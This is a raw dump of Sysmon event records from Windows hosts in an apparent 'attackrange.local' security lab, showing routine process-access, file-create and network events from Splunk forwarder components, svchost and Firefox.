10341000x8000000000000000806293Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.547{0C1E0330-F315-60EB-4479-00000000D001}23601304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000806292Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D996259B1A57BBAEE42E1EB3A982741,SHA256=FF323D5B820135369061379DB0D0879D3D67D7BB9B0AB80A4D1F0C60F1D420B7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806291Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F315-60EB-4479-00000000D001}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806290Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806289Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806288Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806287Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806286Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806285Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806284Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806283Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806282Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806281Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F315-60EB-4479-00000000D001}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806280Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F315-60EB-4479-00000000D001}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806279Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.392{0C1E0330-F315-60EB-4479-00000000D001}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:25.190{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=3F35EF069FB77408A9EE78E38B102F35,SHA256=A5952A37F794CDFAA735B243FE5C1A70435E1DF43CECAB41B8885DA93779C7AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806278Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:25.219{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=11B2D9C207525A814897619BB31A818C,SHA256=3441B5C0D63EAC883D58D9D9216976FBE9123CB474B1F472F0CDB91D01885105,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806277Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.219{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70816EC04134BACD210F87C78F0C3F93,SHA256=FEF34BDDBCE61CE239ACB94E890490879BC9DFFA8D76F4B994A6857AE0154EA6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806276Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:23.305{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57171-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001046429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:26.689{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B7B821F7B86B02A2294FFD052FBFDBC3,SHA256=832CCEF440B3984659C13C213530C7435390440388F20ABF8B3083FB75DCFD18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:26.689{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3D162B1B36F3E948E03DAC4626BB667C,SHA256=60404DCCE3D6AF264081902350106F86CCD4830CE6DBAA923B2B86BFE6A54A11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:26.638{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9404E821E214EE6C10B29873DC72C7D,SHA256=13DF40F45308E5303A75EE6932A8CA8C5BB02A7370903A5E66CF09E2CE14C16E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806322Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.922{0C1E0330-F316-60EB-4679-00000000D001}32402908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806321Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F316-60EB-4679-00000000D001}3240C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806320Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806319Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806318Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806317Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806316Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806315Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806314Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 